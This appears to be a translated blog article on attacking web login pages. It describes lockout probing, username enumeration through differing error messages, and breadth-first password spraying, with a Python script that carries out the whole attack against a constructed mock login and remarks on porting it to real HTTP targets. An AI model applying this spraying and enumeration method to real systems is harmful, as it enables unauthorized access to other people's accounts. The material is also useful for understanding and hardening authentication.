The first thing to declare is that this article is purely the ignorant view of a small developer without foresight or knowledge, and is intended only as a reference on web system security.
1. Brief description
Because the login function is exposed to everyone, countless attackers can try to guess usernames and passwords in order to gain unauthorized access to the system.
As the operator of the system, you must make it more robust against a cunning attacker.
As an attacker, you need to observe every detail of the system and gather information that is as close as possible to the actual situation.
2. Steps of an intelligent brute force login attack
First we need a system with weak passwords so that we can try a brute force attack.
1. Try it out with one of your own legitimate accounts, for example submit a few incorrect logins and see what kind of response you receive;
2. If you can still log in correctly after 3-5 failures, the system probably has no account lockout policy, and it is a good target for a regular brute force login attack;
3. If the account does get locked, you can rotate across different accounts instead of hammering one;
4. If the account is locked, submit it with its valid password and check whether the response differs from the one returned for a non-existent account; if it does, the system tells you which usernames are valid;
If you have no valid account at all, first obtain a valid username;
Getting a username is very easy; the most classic method:
The error message echoes the username you entered right after the rest of the text. :)
If there is any possibility of account lockout, prefer breadth across accounts over depth on one account: try one password against many usernames before trying the next password, so that no single account reaches the lockout threshold.
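The procedure above, as an added example that is not part of the original article. The target is a constructed in-memory mock of a login form (`MockLogin`), not a real system; it is assumed to lock an account after `LOCKOUT_THRESHOLD` failed attempts and to leak username validity through its error text. The usernames, passwords and messages are all made up for the demonstration, and the two-round spray limit is an assumed safety margin, not a value from the article.

```python
"""Simulated "intelligent" brute force login attack: probe for lockout with
our own account, check whether error messages reveal valid usernames, then
spray breadth-first. Added example; the target below is a constructed mock."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

LOCKOUT_THRESHOLD = 3                       # mock policy; the attacker does not know it
MOCK_USERS = {"alice": "Summer2019!", "bob": "Passw0rd", "carol": "letmein"}


@dataclass
class MockLogin:
    """Constructed stand-in for a web login endpoint. login() returns
    (status, message) the way an HTTP response would."""
    users: Dict[str, str]
    failures: Dict[str, int] = field(default_factory=dict)
    requests: int = 0

    def login(self, username: str, password: str) -> Tuple[int, str]:
        self.requests += 1
        if username not in self.users:
            return 200, "Error: user does not exist"      # leaks username validity
        if self.failures.get(username, 0) >= LOCKOUT_THRESHOLD:
            return 200, "Error: account locked"           # also leaks validity
        if self.users[username] == password:
            self.failures[username] = 0                   # success resets the counter
            return 302, "Welcome"
        self.failures[username] = self.failures.get(username, 0) + 1
        return 200, "Error: wrong password"


def probe_lockout(target: MockLogin, user: str, password: str, attempts: int = 5) -> bool:
    """Steps 1-2: fail `attempts` times with our own account, then send the
    real password. If that no longer works, a lockout policy exists."""
    for i in range(attempts):
        target.login(user, f"wrong-{i}")
    status, _ = target.login(user, password)
    return status != 302


def probe_enumeration(target: MockLogin, user: str) -> Tuple[bool, str]:
    """Step 4: compare the response for a known account (locked or not) with
    the response for a name that certainly does not exist."""
    bogus = "no-such-user-9f2c"                           # assumed not to exist
    _, known_msg = target.login(user, "x")
    _, bogus_msg = target.login(bogus, "x")
    return known_msg != bogus_msg, bogus_msg


def enumerate_users(target: MockLogin, candidates: List[str], invalid_msg: str) -> List[str]:
    """Obtain valid usernames: any candidate whose response differs from the
    invalid-user message exists. Costs one failure per real account."""
    return [u for u in candidates if target.login(u, "x")[1] != invalid_msg]


def spray(target: MockLogin, users: List[str], passwords: List[str],
          per_account: Optional[int]) -> Dict[str, str]:
    """Breadth first: one password across every account before moving to the
    next password, so each account sees at most `per_account` attempts."""
    hits: Dict[str, str] = {}
    for round_no, pw in enumerate(passwords):
        if per_account is not None and round_no >= per_account:
            break                                          # stay under the lockout
        for u in users:
            if u not in hits and target.login(u, pw)[0] == 302:
                hits[u] = pw
    return hits


def depth_first(target: MockLogin, user: str, passwords: List[str]) -> Optional[str]:
    """The naive approach for contrast: every password against one account."""
    for pw in passwords:
        if target.login(user, pw)[0] == 302:
            return pw
    return None


def run_attack(target: MockLogin, known_user: str, known_pass: str,
               candidates: List[str], passwords: List[str]):
    locked = probe_lockout(target, known_user, known_pass)
    enumerable, invalid_msg = probe_enumeration(target, known_user)
    users = enumerate_users(target, candidates, invalid_msg) if enumerable else list(candidates)
    # Lockout seen within 5 failures and enumeration already cost one failure
    # per account, so allow only two spray rounds (assumed margin); no limit
    # when no lockout was observed.
    hits = spray(target, users, passwords, 2 if locked else None)
    return hits, locked, enumerable, users


if __name__ == "__main__":
    t = MockLogin(dict(MOCK_USERS))
    print(run_attack(t, "alice", "Summer2019!",
                     ["alice", "bob", "dave", "carol", "eve"],
                     ["Passw0rd", "letmein", "123456"]), t.requests)
    d = MockLogin(dict(MOCK_USERS))
    print(depth_first(d, "carol", ["a", "b", "c", "letmein"]), d.failures)
```

With the mock above, the breadth-first run recovers two accounts without locking any of them, while the depth-first run against `carol` burns the three allowed failures and is then refused even when it reaches the right password. Against a real target the same logic would sit behind an HTTP client, and the response comparison should cover status code, body and timing, since a message difference is only the most obvious of the leaks.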
Watch your door - Authentication mechanism attacked (3) - Intelligent brute force login attack